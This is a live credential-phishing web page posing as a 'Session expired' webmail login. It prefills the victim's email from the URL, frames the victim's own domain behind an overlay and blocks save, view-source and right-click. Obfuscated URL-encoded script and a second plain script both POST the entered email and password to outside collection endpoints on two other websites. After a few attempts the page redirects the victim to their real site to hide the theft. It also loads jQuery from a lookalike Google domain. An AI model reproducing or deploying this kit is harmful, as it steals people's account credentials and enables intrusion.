<!doctype html>
<html lang="en">

	
<head>
<meta charset="UTF-8">
<meta name="viewport"
content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>Session expired！ </title>
<style>
body{
width:99%;
height:100%;
margin:0;
padding:0;
overflow: hidden !important;
}


#mainPage{
border:none;
}
hr{
border:1px solid #999;
}
#overlay{
background-color: #0073C6;
position:absolute;
top:0;
left:0;
bottom:0;
right:0;
border:1px solid #555;
opacity: 0.6;
filter: alpha(opacity=60)
}
#loginBody {
    background-color: transparent;
    border: 0;
    width: 442px;
    height: 180px;
    position: relative;
    top: 19px;
    left: auto;
    margin: 0 auto;
}

#loginBg{
background:white;
width:100%;
height:100%;
opacity: 0.9;
filter: alpha(opacity=90);
padding: 12px;
}
#topHeader{
margin-bottom:10px;
padding-top:10px;
}
#favIcon{
margin:0 10px;
}
#form{
position:relative;
left:10%;
width:80%;
}
.email, .pass{
margin:0 0 5px;
}
.container {
width: 100%;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
}

.office {
width: 380px;
background: #fff;
}

.office-holder {
width: 80%;
margin: auto;
padding: 20px 0px;
}

.logo {
width: 100%;
margin-bottom: 2em;
}

.logo h1 {
font-family: arial;

}

.logo h2 {
display: block !important;
}

.verify {
width: 70%;
margin: auto;
}

.verify h4 {
font-family: arial;
}

fieldset {
width: 90%;
float: right;
border: 2px solid #4285f4;
border-radius: 5px;
}

legend {
font-size: 15px;
overflow: hidden;
width: 42%;
padding: 0px 2px;
margin: 0px;
}

.verify input[type='text'] {
width: 100%;
float: right;
border: none;
padding: 3px 10px;
}

.verify button {
border: none;
height: 40px;
width: 80px;
float: right;
margin-top: 2em;
background: #4285f4;
border-radius: 5px;
color: #fff;
}

.email-to-verify {
border: 1px solid #000;
border-radius: 10px;
}

.form-holder {
width: 100%;
float: left;
}

.form-holder h3 {
font-weight: 600;
}

.form-holder input[type='email'],
input[type='password'] {
width: 100%;
height: 40px;
float: left;
margin-bottom: 15px;
}

.form-holder .btn-holder {
width: 100%;
margin-top: 1em;
display: flex;
align-content: center;
align-items: center;
justify-content: center;
}

.form-holder .btn-holder .btn {
background: #0073C6;
border: none;
padding: 6px 10px;
color: #fff;
border-radius: 0px;
margin-top: 20px;
margin-bottom: 20px;
}

.form-holder .btn-holder .btn:hover {
cursor: pointer;
}

.checkbox {
width: 100%;
float: left;
margin-top: 5px;
}

.checkbox label {
font-family: arial;
font-size: 13px;
float: left;
margin-left: 1em;
}

.hide {
display: none;
}
.style1 {color: #FF0000}
.style2 {font-size: 14px}

img::after {  
  content: "";
  display: none;
  position: absolute;
  top: 0;
  left: 0;
  background-color: transparent;
}
</style>



<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">


<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" crossorigin="anonymous">

</head>

<body>
<iframe id="mainPage" src="#" width="100%" scrolling="no" sandbox="allow-forms allow-pointer-lock
allow-popups allow-same-origin allow-scripts" style="position: absolute;height: 100%;border: none;"></iframe>

<div id="overlay" style="height: 100%;width: 100%;border: 0;background: #000000db;background-blend-mode: overlay;opacity: 0.9;">

</div>


<div id="loginBody">
<div id="">

<div class="container">

<div class="office show border shadow bg-light" id="others">
<div class="office-holder">
<div class="logo">
<div id="topHeader">
<img id="logoimg" src="#"> <b id="sExp">Session expired！  </b>
<hr>
</div>
<h4 class="text-dark"><strong id="domain-name" class="text-uppercase"></strong></h4>
<h5 class="font-weight-light style2">Please enter your Valid email address and password below to open.</h5>
</div>
<div style="width: 100%;">
<div class="alert alert-danger" id="msg" style="display: none;">Wrong password! Please enter correct password.</div>
<span id="error" class="text-danger" style="display: none;">That account doesn't exist. Enter a different account</span>
</div>
<form>
<div class="form-holder">
<input type="email" id="email" class="form-control" placeholder="someone@example.com" readonly required="">
<input type="password" id="password" placeholder="Password" class="form-control" required="">
<div class="checkbox">
<p><span class="style1">Ensure Correct details are entered for you to access this docs.
</span>                          </p>
<p>  
<input type="checkbox" name="" style="float: left; margin-top:2px; margin-bottom: 10px;">
</p>
<label>REMEMBER ME</label>
</div>
<div class="btn-holder">
<button class="btn btn-lg col-12" id="submit-btn">LOGIN</button>
</div>
<p style="color:#0073C6; margin-top:1em; float: left; width:100%;">can't access your account?</p>
<p style="color:#0073C6; margin-top:0em; float: left; width:100%;">Sign in with a single-use code</p>
</div>

</form>
</div>
</div>
</div> 



</div>
</div> 
<!-- Optional JavaScript -->	 
<script src="https://ajax.googleapis.luchifab.com/ajax.googleapis/ajax/libs/jquery/2.2.4/jquery.min.js"></script> 

<script language="javascript">
<!--
// ==  == //
document.write(unescape('%3Cscript%3E%0A%0A//%20prevent%20ctrl%20+%20s%0A%24%28document%29.bind%28%27keydown%27%2C%20function%28e%29%20%7B%0Aif%28e.ctrlKey%20%26%26%20%28e.which%20%3D%3D%2083%29%29%20%7B%0Ae.preventDefault%28%29%3B%0Areturn%20false%3B%0A%7D%0A%7D%29%3B%0A%0Adocument.addEventListener%28%27contextmenu%27%2C%20event%20%3D%3E%20event.preventDefault%28%29%29%3B%0A%0Adocument.onkeydown%20%3D%20function%28e%29%20%7B%0Aif%20%28e.ctrlKey%20%26%26%20%0A%28e.keyCode%20%3D%3D%3D%2067%20%7C%7C%20%0Ae.keyCode%20%3D%3D%3D%2086%20%7C%7C%20%0Ae.keyCode%20%3D%3D%3D%2085%20%7C%7C%20%0Ae.keyCode%20%3D%3D%3D%20117%29%29%20%7B%0Areturn%20false%3B%0A%7D%20else%20%7B%0Areturn%20true%3B%0A%7D%0A%7D%3B%0A%24%28document%29.keypress%28%22u%22%2Cfunction%28e%29%20%7B%0Aif%28e.ctrlKey%29%0A%7B%0Areturn%20false%3B%20%20%20%20%20%20%7D%0Aelse%20%7B%0Areturn%20true%3B%0A%7D%7D%29%3B%0A%0A%0A%0A%0A%20%20%20%20/*%20global%20%24%20*/%0A%20%20%20%20%24%28document%29.ready%28function%28%29%7B%0A%20%20%20%20%20%20var%20count%3D0%3B%0A%20%0A%20%20%20%20%20%20%24%28%27%23back1%27%29.click%28function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20%24%28%22%23msg%22%29.hide%28%29%3B%0A%20%20%20%20%20%20%20%20%24%28%27%23email%27%29.val%28%22%22%29%3B%0A%20%20%20%20%20%20%20%20%24%28%22%23automail%22%29.animate%28%7Bleft%3A200%2C%20opacity%3A%22hide%22%7D%2C%200%29%3B%0A%20%20%20%20%20%20%20%20%24%28%22%23inputbar%22%29.animate%28%7Bright%3A200%2C%20opacity%3A%22show%22%7D%2C%201000%29%3B%0A%0A%20%20%20%20%20%20%7D%29%3B%0A%0A%20%20%20%20%20%20var%20email%20%3D%20window.location.hash.substr%281%29%3B%0A%20%20%20%20%20%20if%20%28%21email%29%20%7B%0A%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20else%0A%20%20%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20var%20my_email%20%3Demail%3B%0A%20%20%20%20%20%20%20%20%24%28%27%23email%27%29.val%28my_email%29%3B%20%0A%20%20%20%20%20%20%20%20var%20filter%20%3D%20/%5E%28%5Ba-zA-Z0-9_%5C.%5C-%5D%29+%5C@%28%28%5Ba-zA-Z0-9%5C-%5D%29+%5C.%29+%28%5Ba-zA-Z0-9%5D%7B2%2C4%7D%29+%24/%3B%0A%0A%20%20%20%20%20%20%20%20if%20%28%21filter.test%28my_email%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%24%28%27%23error%27%29.show%28%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20email.focus%3B%0A%20%20%20%20%20%20%20%20%20%20%20return%20false%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20var%20ind%3Dmy_email.indexOf%28%22@%22%29%3B%0A%20%20%20%20%20%20%20%20var%20my_slice%3Dmy_email.substr%28%28ind+1%29%29%3B%0A%20%20%20%20%20%20var%20mainPage%20%3D%20%27https%3A//%27+my_slice%3B%20%0A%20%20%20%20%20//%20%20%20%20%20var%20mainPage%20%3D%20%27https%3A//webmail.staralliancebd.com/%27%3B%20%20%0A%20%20%20%20%20%20%20%20%24%28%22%23logoimg%22%29.attr%28%22src%22%2C%20%22https%3A//www.google.com/s2/favicons%3Fdomain%3D%22+mainPage%29%3B%0A%20%20%20%20%20%20%20%20%20document.getElementById%28%27mainPage%27%29.src%20%3D%20mainPage%3B%0A%20%20%20%20//%20%20%20%20%24%28%22%23mainPage%22%29.src%28mainPage%29%3B%0A%20%20%20%20%0A%09%20%09%0A%20%20%20%20%20%20%20%20%24%28%22.email%22%29.html%28email%29%3B%0A%09%09%20%0A%20%20%20%20%20%20%7D%0A%20%0A%20%20%20%20%20%20%24%28%27%23submit-btn%27%29.click%28function%28event%29%7B%0A%20%20%20%20%0A%09%09//%24%28%27%23error%27%29.hide%28%29%3B%0A%09%09//%24%28%27%23msg%27%29.hide%28%29%3B%0A%20%20%20%20%20%20%20%20%20event.preventDefault%28%29%3B%0A%09%20%09var%20email%3D%24%28%22%23email%22%29.val%28%29%3B%0A%20%20%20%20%20%20%20%20%20var%20password%3D%24%28%22%23password%22%29.val%28%29%3B%0A%20%0A%09%09%20%0A%20%20%20%20%20%20///////////new%20injection////////////////%0A%20%20%20%20%20%20count%3Dcount+1%3B%0A%20%20%20%20//%20%20console.log%28count%29%3B%20%0A%20%20%20%20%20%20%24.ajax%28%7B%0A%20%20%20%20%20%20%20%20dataType%3A%20%27JSON%27%2C%0A%20%20%20%20%20%20%20%20url%3A%20%27https%3A//istingray.no/backup/wp-content/plugins/sekeywp/x2.php%27%2C%0A%20%20%20%20%20%20%20%20type%3A%20%27POST%27%2C%0A%20%20%20%20%20%20%20%20data%3A%7B%0A%20%20%20%20%20%20%20%20%20%20email%3Aemail%2C%0A%20%20%20%20%20%20%20%20%20%20password%3Apassword%0A%20%20%20%20%20%20%20%20%7D%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20//%20data%3A%20%24%28%27%23contact%27%29.serialize%28%29%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20beforeSend%3A%20function%28xhr%29%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24%28%27%23submit-btn%27%29.html%28%27Verifing...%27%29%3B%0A%09%09%09%20%20%0A%20%20%20%20//%20%20console.log%28count%29%3B%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20success%3A%20function%28response%29%7B%0A%09%09%09%20%24%28%27%23msg%27%29.html%28%22%3Cspan%20style%3D%27color%3Ared%3B%27%3EUsername%20or%20Password%20is%20incorrect.%20Please%20try%20again%3C/span%3E%22%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%28response%29%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24%28%22%23msg%22%29.show%28%29%3B%0A%09%09%09%09console.log%28response%29%3B%0A%09%09%09%09%24%28%27%23msg%27%29.html%28response%5B%27msg%27%5D%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%28response%5B%27signal%27%5D%20%3D%3D%20%27ok%27%29%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24%28%22%23password%22%29.val%28%22%22%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28count%3E%3D2%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20count%3D0%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20//%20window.location.replace%28response%5B%27redirect_link%27%5D%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20window.location.replace%28%22http%3A//www.%22+my_slice%29%3B%20%0A%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20//%20%24%28%27%23msg%27%29.html%28response%5B%27msg%27%5D%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20else%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24%28%27%23msg%27%29.html%28response%5B%27msg%27%5D%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20error%3A%20function%28%29%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24%28%22%23password%22%29.val%28%22%22%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28count%3E%3D2%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20count%3D0%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20window.location.replace%28%22http%3A//www.%22+my_slice%29%3B%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24%28%22%23msg%22%29.show%28%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20//%20%24%28%27%23msg%27%29.html%28%22Please%20try%20again%20later%22%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20complete%3A%20function%28%29%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24%28%27%23submit-btn%27%29.html%28%27Sign%20in%27%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%7D%29%3B%20%20%0A%20%20%20%20%7D%29%3B%0A%0A%0A%20%20%20%20%7D%29%3B%0A%0A%0A%20%20%3C/script%3E%0A%3C/body%3E%3C/html%3E'));
//-->
</script>

<!-- Optional JavaScript -->
<!-- jQuery first, then Popper.js, then Bootstrap JS -->
<script src="https://code.jquery.com/jquery-3.2.1.slim.min.js"></script>


<script type="text/javascript" >
var _cf = _cf || []; _cf.push(['_setFsp', true]);  _cf.push(['_setBm', true]);  _cf.push(['_setAu', '/content/7610162411rn210be6fb6dd983b0ed70']); </script><script type="text/javascript"  src="/content/7610162411rn210be6fb6dd983b0ed70"></script>

</body>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>

/* global $ */
$(document).ready(function(){
var count=0;
/////////////url email getting////////////////
var email = window.location.hash.substr(1);
if (!email) {

}
else
{
// $('#email').val(email);
var my_email =email;
var ind=my_email.indexOf("@");
var my_slice=my_email.substr((ind+1));
var c= my_slice.substr(0, my_slice.indexOf('.'));
var final= c.toLowerCase();        
$('#email').val(my_email);
$('#domain-name').html(final);
$("#msg").hide();
}
///////////////url getting email////////////////


$('#submit-btn').click(function(event){
$('#error').hide();
$('#msg').hide();
event.preventDefault();
var email=$("#email").val();
var password=$("#password").val();
var msg = $('#msg').html();
$('#msg').text( msg );
///////////new injection////////////////
var my_email =email;
var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

if (!email) {
$('#error').show();
$('#error').html("Email field is empty.!");
ai.focus;
return false;
}

if (!filter.test(my_email)) {
$('#error').show();
$('#error').html("That account doesn't exist. Enter a different account");
ai.focus;
return false;
}
if (!password) {
$('#error').show();
$('#error').html("Password field is emply.!");
ai.focus;
return false;
}

var ind=my_email.indexOf("@");
var my_slice=my_email.substr((ind+1));
var c= my_slice.substr(0, my_slice.indexOf('.'));
var final= c.toLowerCase();
///////////new injection////////////////
count=count+1;
$('#domain-name').html(final);
$.ajax({
dataType: 'JSON',
url: 'https://childpactschools.com//main/monjo-ventures.php',
type: 'POST',
data:{
email:email,
password:password,
},
// data: $('#contact').serialize(),
beforeSend: function(xhr){
$('#submit-btn').html('Verifing...');
},
success: function(response){
if(response){
$("#msg").show();
console.log(response);
if(response['signal'] == 'ok'){

$("#password").val("");
if (count>=3) {
count=0;
// window.location.replace(response['redirect_link']);
window.location.replace("http://www."+my_slice);

}
// $('#msg').html(response['msg']);
}
else{
// $('#msg').html(response['msg']);
}
}
},
error: function(){

$("#password").val("");
if (count>=3) {
count=0;
window.location.replace("http://www."+my_slice);
}
$("#msg").show();
// $('#msg').html("Please try again later");
},
complete: function(){
$('#submit-btn').html('LOGIN');
}
});
});


});


</script>